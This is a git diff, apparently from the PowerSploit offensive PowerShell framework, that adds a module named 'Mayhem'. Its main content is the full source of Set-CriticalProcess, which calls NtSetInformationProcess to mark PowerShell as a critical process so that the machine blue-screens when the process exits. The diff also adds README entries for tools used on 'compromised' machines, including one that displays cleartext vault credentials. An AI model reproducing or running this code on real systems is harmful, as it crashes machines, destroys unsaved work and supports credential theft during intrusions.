in the caller's environment prior to importing this module. +# ScriptsToProcess = '' + +# Type files (.ps1xml) to be loaded when importing this module +# TypesToProcess = @() + +# Format files (.ps1xml) to be loaded when importing this module +# FormatsToProcess = @() + +# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess +# NestedModules = @() + +# Functions to export from this module +FunctionsToExport = '*' + +# Cmdlets to export from this module +CmdletsToExport = '*' + +# Variables to export from this module +VariablesToExport = '' + +# Aliases to export from this module +AliasesToExport = '' + +# List of all modules packaged with this module. +ModuleList = @(@{ModuleName = 'Mayhem'; ModuleVersion = '1.0.0.0'; GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'}) + +# List of all files packaged with this module +FileList = 'Mayhem.psm1', 'Mayhem.psd1', 'Usage.md' + +# Private data to pass to the module specified in RootModule/ModuleToProcess +# PrivateData = '' + +# HelpInfo URI of this module +# HelpInfoURI = '' + +# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. +# DefaultCommandPrefix = '' + +} diff --git a/Mayhem/Mayhem.psm1 b/Mayhem/Mayhem.psm1 new file mode 100644 index 0000000..a8cd424 --- /dev/null +++ b/Mayhem/Mayhem.psm1 @@ -0,0 +1,99 @@ +function Set-CriticalProcess +{ +<# +.SYNOPSIS + +Causes your machine to blue screen upon exiting PowerShell. + +PowerSploit Function: Set-CriticalProcess +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +.PARAMETER ExitImmediately + +Immediately exit PowerShell after successfully marking the process as critical. + +.PARAMETER Force + +Set the running PowerShell process as critical without asking for confirmation. + +.EXAMPLE + +Set-CriticalProcess + +.EXAMPLE + +Set-CriticalProcess -ExitImmediately + +.EXAMPLE + +Set-CriticalProcess -Force -Verbose + +#> + + [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param ( + [Switch] + $Force, + + [Switch] + $ExitImmediately + ) + + if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) + { + throw 'You must run Set-CriticalProcess from an elevated PowerShell prompt.' + } + + $Response = $True + + if (!$Force) + { + $Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.') + } + + if (!$Response) + { + return + } + + $DynAssembly = New-Object System.Reflection.AssemblyName('BlueScreen') + $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) + $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BlueScreen', $False) + + # Define [ntdll]::NtQuerySystemInformation method + $TypeBuilder = $ModuleBuilder.DefineType('BlueScreen.Win32.ntdll', 'Public, Class') + $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('NtSetInformationProcess', + 'ntdll.dll', + ([Reflection.MethodAttributes] 'Public, Static'), + [Reflection.CallingConventions]::Standard, + [Int32], + [Type[]] @([IntPtr], [UInt32], [IntPtr].MakeByRefType(), [UInt32]), + [Runtime.InteropServices.CallingConvention]::Winapi, + [Runtime.InteropServices.CharSet]::Auto) + + $ntdll = $TypeBuilder.CreateType() + + $ProcHandle = [Diagnostics.Process]::GetCurrentProcess().Handle + $ReturnPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(4) + + $ProcessBreakOnTermination = 29 + $SizeUInt32 = 4 + + try + { + $null = $ntdll::NtSetInformationProcess($ProcHandle, $ProcessBreakOnTermination, [Ref] $ReturnPtr, $SizeUInt32) + } + catch + { + return + } + + Write-Verbose 'PowerShell is now marked as a critical process and will blue screen the machine upon exiting the process.' + + if ($ExitImmediately) + { + Stop-Process -Id $PID + } +}
\ No newline at end of file diff --git a/Mayhem/Usage.md b/Mayhem/Usage.md new file mode 100644 index 0000000..c5c316f --- /dev/null +++ b/Mayhem/Usage.md @@ -0,0 +1,12 @@ +To install this module, drop the entire Mayhem folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. + +The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" +The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" + +To use the module, type `Import-Module Mayhem` + +To see the commands imported, type `Get-Command -Module Mayhem` + +For help on each individual command, Get-Help is your friend. + +Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
\ No newline at end of file @@ -20,10 +20,6 @@ Injects shellcode into the process ID of your choosing or within PowerShell loca Execute shellcode within the context of the running PowerShell process without making any Win32 function calls. -#### `Watch-BlueScreen` - -Cause a blue screen to occur (Windows 7 and below). - ## ScriptModification **Modify and/or prepare scripts for execution on a compromised machine.** @@ -192,10 +188,22 @@ Lists the device paths of all local volume shadow copies. Mounts a volume shadow copy. +#### `Get-VaultCredential` + +Displays Windows vault credential objects including cleartext web credentials. + #### `Out-Minidump` Generates a full-memory minidump of a process. +## Mayhem + +**Cause general mayhem with PowerShell.** + +#### `Set-CriticalProcess` + +Causes your machine to blue screen upon exiting PowerShell. + ## Recon **Tools to aid in the reconnaissance phase of a penetration test.** |